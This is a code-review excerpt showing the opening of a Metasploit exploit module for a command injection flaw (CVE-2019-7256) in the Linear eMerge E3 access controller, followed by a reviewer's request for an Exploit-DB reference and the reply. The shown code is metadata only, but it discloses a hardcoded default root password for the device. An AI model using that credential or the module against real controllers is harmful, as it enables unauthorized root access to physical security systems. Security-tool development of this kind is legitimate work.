modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb

```diff
@@ -0,0 +1,126 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  # Default root password on a Linear eMerge E3 access controller
+  ROOT_PWD = 'davestyle'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Linear eMerge E3 Access Controller Command Injection',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in the Linear eMerge
+          E3 Access Controller. The issue is triggered by an unsanitized exec() PHP
+          function allowing arbitrary command execution with root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor
+        ],
+        'References' => [
+          [ 'CVE', '2019-7256'],
+          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],
+          [ 'URL', 'https://www.nortekcontrol.com' ],
+          [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],
+          [ 'PACKETSTORM', '155256']
```

Comment:
Missing EDB reference for https://www.exploit-db.com/exploits/47649

Reply:
Done. See https://github.com/rapid7/metasploit-framework/pull/17312/commits/008ba5334b2aeea230933567d1b7503232a016b5